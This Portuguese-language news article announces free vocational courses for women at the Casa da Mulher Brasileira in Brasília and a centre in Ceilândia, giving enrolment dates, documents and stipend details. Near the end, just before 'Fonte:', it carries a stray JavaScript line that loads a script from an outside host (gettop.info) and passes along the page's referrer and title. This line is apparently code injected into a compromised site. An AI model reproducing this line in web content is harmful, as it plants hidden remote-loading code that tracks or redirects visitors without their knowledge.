Casa da Mulher Brasileira oferece 100 vagas em três cursos profissionalizantes gratuitos

Entrevista Mirian Belchior,ministra
Casa da Mulher Brasileira funciona na Quadra 601 da L2 Norte. Foto: EBC

 

Estão abertas até 26 de setembro as pré-inscrições para cem vagas em três cursos profissionalizantes gratuitos para mulheres: recepcionista (assistente administrativo), massagista e cuidadora de idosos. As candidatas em situação de violência e vulnerabilidade social têm prioridade para se inscrever.

Duas modalidades serão oferecidas na Casa da Mulher Brasileira (L2 Norte, Quadra 601): recepcionista e massagista. As pré-inscrições podem ser feitas pelo telefone (61) 3224-6508 ou pelo e-mail [email protected]

Outra turma de recepcionista e uma de cuidadora de idosos terão as aulas ministradas no Centro de Atendimento à Mulher Vítima de Violência Doméstica, em Ceilândia (QNM 2, Conjunto F, Lotes 1/3, Ceilândia Centro). As interessadas devem ligar para o telefone (61) 3373-6668.

Documentação – As selecionadas devem comparecer ao local do curso de 27 a 30 de setembro para entregar os documentos exigidos: foto 3×4, original e cópia simples de comprovante de residência, identidade e cadastro de pessoas físicas (CPF). Caso sobrem vagas, será aberta lista de espera.

Com término previsto para janeiro e fevereiro, a capacitação começa em 11 de outubro, com aulas às segundas, quartas e sextas-feiras, em horários a serem definidos. As matriculadas receberão ajuda de custo de R$ 1,50 hora/aula. O valor deve ser pago um mês depois do início das aulas e será proporcional à frequência. Todos os cursos dão direito ao passe livre.

As capacitações fazem parte do Programa Nacional Mulheres Mil, do Programa Nacional de Acesso ao Ensino Técnico e Emprego (Pronatec), oferecidas em parceria com a Secretaria do Trabalho, Desenvolvimento Social, Mulheres, Igualdade Racial e Direitos Humanos.

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário